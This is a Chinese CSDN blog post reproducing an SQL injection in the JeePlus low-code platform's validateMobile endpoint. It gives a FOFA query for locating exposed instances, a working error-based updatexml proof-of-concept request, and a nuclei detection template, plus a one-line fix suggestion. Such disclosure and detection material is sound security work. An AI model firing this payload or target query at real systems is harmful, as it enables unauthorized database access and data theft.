JeePlus低代码开发平台存在SQL注入漏洞

最新推荐文章于 2024-04-15 07:58:29 发布
最新推荐文章于 2024-04-15 07:58:29 发布
阅读量560 收藏 2
点赞数 4
文章标签: sql 数据库 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/136452281
版权

JeePlus低代码开发平台存在SQL注入漏洞复现

1.漏洞介绍

JeePlus低代码开发平台存在SQL注入漏洞

2.漏洞编号
CVECNVDCNNVD
---

3.影响范围
名称版本号
-

4.检索特征

FOFA:app=“JeePlus”
在这里插入图片描述

5.POC
GET /a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+md5%281%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/2
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*

在这里插入图片描述

nuclei检测

id: JeePlus-SQLi

info:
  name: JeePlus低代码开发平台存在SQL注入漏洞
  author: test
  severity: high
  description: |
    JeePlus低代码开发平台存在SQL注入漏洞
  metadata:
    fofa-query: app="JeePlus"
  reference:
    - https://127.0.0.1
  tags: auto

http:
  - raw:
      - |
        GET /a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+md5%281%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
        Accept: */*
        Connection: Keep-Alive


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "c4ca4238a0b923820dcc509a6f75849"

6.修复建议

更新到最新版本

7.参考信息
qq_36334672
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JeePlus快速开发平台 多处 SQL注入漏洞复现
0xSec
02-07 888
JeePlus快速开发平台resetPassword、registerUser等接口处存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
JeePlus快速开发平台 validateMobile SQL注入漏洞复现
0xSec
02-20 515
JeePlus快速开发平台validateMobile 接口处存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞(1)
2301_77033340的博客
04-15 308
【代码】JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞(1)
记一次曲折的获取权限
m0_60571990的博客
12-10 840
记一次曲折的获取权限
JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞
最新发布
2301_77033340的博客
04-15 812
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
jeeplus集成java项目登录时出现shorio异常原因及解决
qq_44909614的博客
04-18 363
jeeplus 框架 集成java项目 shorio出现异常/登录时出现系统错误
浅析JeePlus
cerf-volant的博客
12-13 3606
浅析JeePlus一、前言二、代码组成2.1 Java2.2 Resources三、基本流程对应代码四、常见自定义操作4.1 菜单4.2 添加字段4.3 添加查询条件4.4 查询文本框的更改4.4.1 改为下拉菜单4.4.2 改为日期选择4.5 自定义数据库语句4.6 更改操作4.7 定时任务4.8 导出Excel的显示字段五、常见问题5.1 日期选择器5.2 ***Mapper.xml中数据库的...
CMS建站平台Java版-Jeeplus cms
mhlywxl的博客
10-11 961
本章主要介绍Java版的CMS建站平台Jeeplus Cms,众所周知,市面上的CMS平台基本上都是php语言,漏洞比较多,基本上不维护,而且php语言已经相对落后;相比而言Java版的修改灵活方便,可拓展性强,性价比高一、平台特点cms建站神器可以同时管理维护多个网站可定制不同主题模板,基于freemarker语法更友好的交互体验,内容发布实时展示灵活的建站设置,支持多种类型的网站网站类型多样化,不同主题随意切换面向全屏幕尺寸的响应式适配能力后台基于Java框架,方便集群和性能调优。
jeeplus 注册功能---用户名、邮箱验证
weixin_34326179的博客
11-08 416
2019独角兽企业重金招聘Python工程师标准>>> ...
jeeplus mysql_说明 - Jeeplus
weixin_32275943的博客
02-17 190
jeeplus快速开发框架是一款收费开源的商业框架,采用license进行授权管理,商业使用请购买社区授权JeePlus是一款基于代码生成器的JAVAEE快速开发平台,可以帮助解决java项目中绝大部分的的重复工作,让开发者更多关注业务逻辑。Jeeplus支持单表,主附表,一对一,一对多,多对多,左树右表的直接生成,只需简单配置,就可以生成数千行高质量代码,5分钟快速开发一个业务逻辑,一周开发一个...
jeeplus带工作流开发框架ani.zip
09-01
jeeplus开发框架ani带工作流。可完整运行通过。仅限研究学习使用。 jeeplus开发框架ani带工作流。可完整运行通过。仅限研究学习使用。
Jeeplus使用文档
02-09
帮助你快速使用jeeplus,及jeeplus的平台介绍、标签使用、内置组件,代码生成等。
Jeeplus源码-内置组件讲解
11-03
该资源介绍了jeeplus中内置组件的结构,用户管理组件,字典组件,文件上传组件,以及权限管理组件的内容和API的说明。
JAVA企业快速通用开发平台框架源码(基于Bootstrap的Java企业通用开发平台框架)+部署文档及视频[请勿商用]
03-31
JAVA企业快速通用开发平台框架源码+部署文档及视频[请勿商用] 框架为SSM+Bootstrap + mysql数据
Java基于jeeplus vue实现简单工作流过程图解
08-19
主要介绍了Java基于jeeplus vue实现简单工作流过程图解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
jeeplus 常见错误提示
weixin_33713503的博客
10-28 1292
2019独角兽企业重金招聘Python工程师标准>>> ...
小众框架JeePlus的理解
千山暮雪CN
05-17 8330
这两个月修炼了jeeplus相关的东西,如果有新入手jeeplus的兄弟们可以在此博客下面留言,若是能力所能及之处,必不会吝啬。 关于jssplus,一个可以自动根据表生成代码,提供了一些jeeplus中常用的工具类,以及包装了sping的一些常用方法,封装了mybatis,让开发变得轻便起来。代码结构什么的都已经jeeplus都已经帮我们生成了,但是这也代表着系统包装的东西太多,就算是什么也不...
ssm shiro 集群之登录人数限制_代码审计入门之Jeeplus代码审计
weixin_39728544的博客
12-12 263
0×00 前言JeePlus是一款基于代码生成器的javaEE快速开发平台,可以帮助解决java项目中绝大部分的的重复工作,让开发者更多关注业务逻辑。Jeeplus支持单表,主附表,一对一,一对多,多对多,左树右表的直接生成,只需简单配置,就可以生成数千行高质量代码。开发者声称该平台使用目前流行的多种web技术,包括Spring mvc4.0+, MyBatis, Apache Shiro, J2...
jeeplus如何使用代码生成器
04-22
Jeeplus 是一款基于 Java 开发的快速开发框架,它提供了代码生成器的功能可以帮助开发人员快速生成 CRUD 操作所需的代码。 使用 Jeeplus 的代码生成器可以在 Jeeplus 的后台管理系统中通过以下步骤进行: 1. 在 Jeeplus 后台管理系统中选择“开发工具”->“代码生成器”菜单 2. 选择需要生成的数据库表 3. 根据需要选择生成的代码类型和功能 4. 点击“生成”按钮,生成所需的代码 生成的代码包括 Controller、Service、Dao 和 Entity 等基本组件,并且可以根据需要进行自定义修改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值